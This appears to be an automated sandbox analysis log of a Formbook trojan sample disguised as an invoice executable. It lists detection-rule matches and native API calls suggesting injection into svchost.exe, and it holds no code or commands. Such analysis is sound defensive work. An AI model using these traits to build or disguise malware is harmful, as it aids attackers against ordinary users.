            Source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: z1SupplyInvoiceCM60916_Doc.exe
            Source: initial sampleStatic PE information: Filename: z1SupplyInvoiceCM60916_Doc.exe
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0042C633 NtClose,11_2_0042C633
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742B60 NtClose,LdrInitializeThunk,11_2_01742B60
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_01742DF0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_01742C70
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017435C0 NtCreateMutant,LdrInitializeThunk,11_2_017435C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01744340 NtSetContextThread,11_2_01744340
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01744650 NtSuspendThread,11_2_01744650
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742BF0 NtAllocateVirtualMemory,11_2_01742BF0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742BE0 NtQueryValueKey,11_2_01742BE0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742BA0 NtEnumerateValueKey,11_2_01742BA0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742B80 NtQueryInformationFile,11_2_01742B80
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742AF0 NtWriteFile,11_2_01742AF0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742AD0 NtReadFile,11_2_01742AD0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742AB0 NtWaitForSingleObject,11_2_01742AB0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742D30 NtUnmapViewOfSection,11_2_01742D30
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742D10 NtMapViewOfSection,11_2_01742D10
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742D00 NtSetInformationFile,11_2_01742D00
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742DD0 NtDelayExecution,11_2_01742DD0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742DB0 NtEnumerateKey,11_2_01742DB0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742C60 NtCreateKey,11_2_01742C60
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742C00 NtQueryInformationProcess,11_2_01742C00
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742CF0 NtOpenProcess,11_2_01742CF0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742CC0 NtQueryVirtualMemory,11_2_01742CC0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742CA0 NtQueryInformationToken,11_2_01742CA0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742F60 NtCreateProcessEx,11_2_01742F60
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742F30 NtCreateSection,11_2_01742F30
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742FE0 NtCreateFile,11_2_01742FE0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742FB0 NtResumeThread,11_2_01742FB0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742FA0 NtQuerySection,11_2_01742FA0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742F90 NtProtectVirtualMemory,11_2_01742F90
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742E30 NtWriteVirtualMemory,11_2_01742E30
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742EE0 NtQueueApcThread,11_2_01742EE0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742EA0 NtAdjustPrivilegesToken,11_2_01742EA0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742E80 NtReadVirtualMemory,11_2_01742E80
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01743010 NtOpenDirectoryObject,11_2_01743010
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01743090 NtSetValueKey,11_2_01743090
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017439B0 NtGetContextThread,11_2_017439B0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01743D70 NtOpenThread,11_2_01743D70
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01743D10 NtOpenProcessToken,11_2_01743D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03574340 NtSetContextThread,LdrInitializeThunk,15_2_03574340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03574650 NtSuspendThread,LdrInitializeThunk,15_2_03574650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572B60 NtClose,LdrInitializeThunk,15_2_03572B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572BF0 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_03572BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572BE0 NtQueryValueKey,LdrInitializeThunk,15_2_03572BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572BA0 NtEnumerateValueKey,LdrInitializeThunk,15_2_03572BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572AD0 NtReadFile,LdrInitializeThunk,15_2_03572AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572AF0 NtWriteFile,LdrInitializeThunk,15_2_03572AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572F30 NtCreateSection,LdrInitializeThunk,15_2_03572F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572FE0 NtCreateFile,LdrInitializeThunk,15_2_03572FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572FB0 NtResumeThread,LdrInitializeThunk,15_2_03572FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572EE0 NtQueueApcThread,LdrInitializeThunk,15_2_03572EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572E80 NtReadVirtualMemory,LdrInitializeThunk,15_2_03572E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572D10 NtMapViewOfSection,LdrInitializeThunk,15_2_03572D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572D30 NtUnmapViewOfSection,LdrInitializeThunk,15_2_03572D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572DD0 NtDelayExecution,LdrInitializeThunk,15_2_03572DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_03572DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_03572C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572C60 NtCreateKey,LdrInitializeThunk,15_2_03572C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572CA0 NtQueryInformationToken,LdrInitializeThunk,15_2_03572CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035735C0 NtCreateMutant,LdrInitializeThunk,15_2_035735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035739B0 NtGetContextThread,LdrInitializeThunk,15_2_035739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572B80 NtQueryInformationFile,15_2_03572B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572AB0 NtWaitForSingleObject,15_2_03572AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572F60 NtCreateProcessEx,15_2_03572F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572F90 NtProtectVirtualMemory,15_2_03572F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572FA0 NtQuerySection,15_2_03572FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572E30 NtWriteVirtualMemory,15_2_03572E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572EA0 NtAdjustPrivilegesToken,15_2_03572EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572D00 NtSetInformationFile,15_2_03572D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572DB0 NtEnumerateKey,15_2_03572DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572C00 NtQueryInformationProcess,15_2_03572C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572CC0 NtQueryVirtualMemory,15_2_03572CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572CF0 NtOpenProcess,15_2_03572CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03573010 NtOpenDirectoryObject,15_2_03573010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03573090 NtSetValueKey,15_2_03573090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03573D70 NtOpenThread,15_2_03573D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03573D10 NtOpenProcessToken,15_2_03573D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007D8E50 NtCreateFile,15_2_007D8E50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007D8FC0 NtReadFile,15_2_007D8FC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007D90B0 NtDeleteFile,15_2_007D90B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007D9150 NtClose,15_2_007D9150
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007D92B0 NtAllocateVirtualMemory,15_2_007D92B0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 0_2_016CD5BC0_2_016CD5BC
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 0_2_05A73E220_2_05A73E22
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 0_2_05A73E300_2_05A73E30
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0041862311_2_00418623
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0040287011_2_00402870
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0041007311_2_00410073
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0040487411_2_00404874
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0040E0F311_2_0040E0F3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0040110411_2_00401104
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0040111011_2_00401110
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0040125011_2_00401250
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0040326011_2_00403260
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0042EC2311_2_0042EC23
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0040254011_2_00402540
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0040FE4A11_2_0040FE4A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0040FE5311_2_0040FE53
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_004167EE11_2_004167EE
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_004167F311_2_004167F3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0179815811_2_01798158
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AA11811_2_017AA118
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170010011_2_01700100
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C81CC11_2_017C81CC
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D01AA11_2_017D01AA
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C41A211_2_017C41A2
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A200011_2_017A2000
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CA35211_2_017CA352
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171E3F011_2_0171E3F0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D03E611_2_017D03E6
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B027411_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017902C011_2_017902C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171053511_2_01710535
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D059111_2_017D0591
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C244611_2_017C2446
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B442011_2_017B4420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BE4F611_2_017BE4F6
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171077011_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173475011_2_01734750
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170C7C011_2_0170C7C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172C6E011_2_0172C6E0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172696211_2_01726962
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A011_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017DA9A611_2_017DA9A6
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171A84011_2_0171A840
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171284011_2_01712840
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E8F011_2_0173E8F0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F68B811_2_016F68B8
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CAB4011_2_017CAB40
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C6BD711_2_017C6BD7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170EA8011_2_0170EA80
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017ACD1F11_2_017ACD1F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171AD0011_2_0171AD00
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170ADE011_2_0170ADE0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01728DBF11_2_01728DBF
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710C0011_2_01710C00
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01700CF211_2_01700CF2
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0CB511_2_017B0CB5
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01784F4011_2_01784F40
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01730F3011_2_01730F30
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B2F3011_2_017B2F30
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01752F2811_2_01752F28
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171CFE011_2_0171CFE0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01702FC811_2_01702FC8
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178EFA011_2_0178EFA0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710E5911_2_01710E59
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CEE2611_2_017CEE26
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CEEDB11_2_017CEEDB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01722E9011_2_01722E90
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CCE9311_2_017CCE93
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017DB16B11_2_017DB16B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0174516C11_2_0174516C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FF17211_2_016FF172
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171B1B011_2_0171B1B0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C70E911_2_017C70E9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CF0E011_2_017CF0E0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017170C011_2_017170C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BF0CC11_2_017BF0CC
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FD34C11_2_016FD34C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C132D11_2_017C132D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0175739A11_2_0175739A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B12ED11_2_017B12ED
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172B2C011_2_0172B2C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017152A011_2_017152A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C757111_2_017C7571
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D95C311_2_017D95C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AD5B011_2_017AD5B0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170146011_2_01701460
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CF43F11_2_017CF43F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CF7B011_2_017CF7B0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0175563011_2_01755630
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C16CC11_2_017C16CC
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171995011_2_01719950
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172B95011_2_0172B950
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A591011_2_017A5910
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177D80011_2_0177D800
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017138E011_2_017138E0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CFB7611_2_017CFB76
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01785BF011_2_01785BF0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0174DBF911_2_0174DBF9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172FB8011_2_0172FB80
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01783A6C11_2_01783A6C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CFA4911_2_017CFA49
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C7A4611_2_017C7A46
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BDAC611_2_017BDAC6
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01755AA011_2_01755AA0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017ADAAC11_2_017ADAAC
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B1AA311_2_017B1AA3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C7D7311_2_017C7D73
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C1D5A11_2_017C1D5A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01713D4011_2_01713D40
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172FDC011_2_0172FDC0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01789C3211_2_01789C32
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CFCF211_2_017CFCF2
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CFF0911_2_017CFF09
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016D3FD511_2_016D3FD5
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016D3FD211_2_016D3FD2
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CFFB111_2_017CFFB1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01711F9211_2_01711F92
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01719EB011_2_01719EB0
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeCode function: 12_2_010BD5BC12_2_010BD5BC
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeCode function: 12_2_06C1ED9812_2_06C1ED98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FA35215_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_036003E615_2_036003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354E3F015_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035E027415_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035C02C015_2_035C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035C815815_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035DA11815_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0353010015_2_03530100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F81CC15_2_035F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_036001AA15_2_036001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F41A215_2_035F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035D200015_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0356475015_2_03564750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354077015_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0353C7C015_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0355C6E015_2_0355C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354053515_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0360059115_2_03600591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F244615_2_035F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035E442015_2_035E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035EE4F615_2_035EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FAB4015_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F6BD715_2_035F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0353EA8015_2_0353EA80
